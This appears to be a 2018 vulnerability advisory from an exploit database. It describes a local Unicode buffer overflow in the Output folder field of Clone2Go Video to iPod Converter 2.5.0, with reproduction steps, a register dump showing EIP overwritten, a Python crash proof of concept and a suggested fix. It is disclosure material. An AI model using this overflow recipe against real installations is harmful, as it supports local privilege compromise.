Clone2Go Video to iPod Converter 2.5.0 - Unicode Buffer Overflow Vulnerability

2018.09.25
fr ZwX (FR) fr
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#--------------------------------------------------------# #Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Unicode Buffer Overflow Vulnerability #Exploit Author : ZwX #Exploit Date: 2018-09-11 #Vendor Homepage : http://www.clone2go.com/ #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: msk4@live.fr #Website: http://zwx-pentester.fr/ #--------------------------------------------------------# Technical Details & Description: ================================ A classic local unicode buffer overflow vulnerability has been discovered in the official Clone2Go Video to iPod Converter v2.5.0 software. The vulnerability allows local attackers to gain higher system or access privileges by exploitation of a classic unicode buffer overflow vulnerability. Local attackers with low- privilege system user account or restricted system privileges are able to compromise the local system by exploitation of a classic unicode buffer overflow vulnerability. The local attacker copies a specific byte size string to the options index files input to overflow the process and overwrite the registers like ECX,EBX or EIP. Thus allows the local attacker to takeover the system process of the software client to compromise the local system/server. Vulnerable Module(s): [+] Menu > Edit > Options > Set Output folder (Input) Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software and start the client 2. Copy the AAAA...string from bof.txt to clipboard 3. Run VideoConverter.exex 4. Go Menu Menu > Edit > Options > Set Output folder (Input) 5. Paste it the input AAAA....string and click Open 6. A messagebox opens click ok 7. Software will stable crash or shut down 8. Successful reproduce of the local buffer overflow vulnerability! --- Registers --- EAX 8B368BC6 ECX 00410041 VideoCon.00410041 <--- Overwrite EDX 76F16CCD ntdll.76F16CCD EBX 00410041 VideoCon.00410041 <--- Overwrite ESP 00123600 EBP 00123628 ESI 8B368BC6 EDI 00000000 EIP 00410041 VideoCon.00410041 <--- Overwrite --- Code Python --- #!/usr/bin/python buffer = "\x41" * 430 poc = buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX" print " Email: msk4@live.fr" Solution - Fix & Patch: ======================= Restrict the Set Output folder input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field. Disclaimer: =========== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Copyright © 2018 | ZwX - Security Researcher (Software & web application)

References:

http://zwx-pentester.fr/2018/09/15/clone2go-video-to-ipod-converter-2-5-0-unicode-buffer-overflow-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top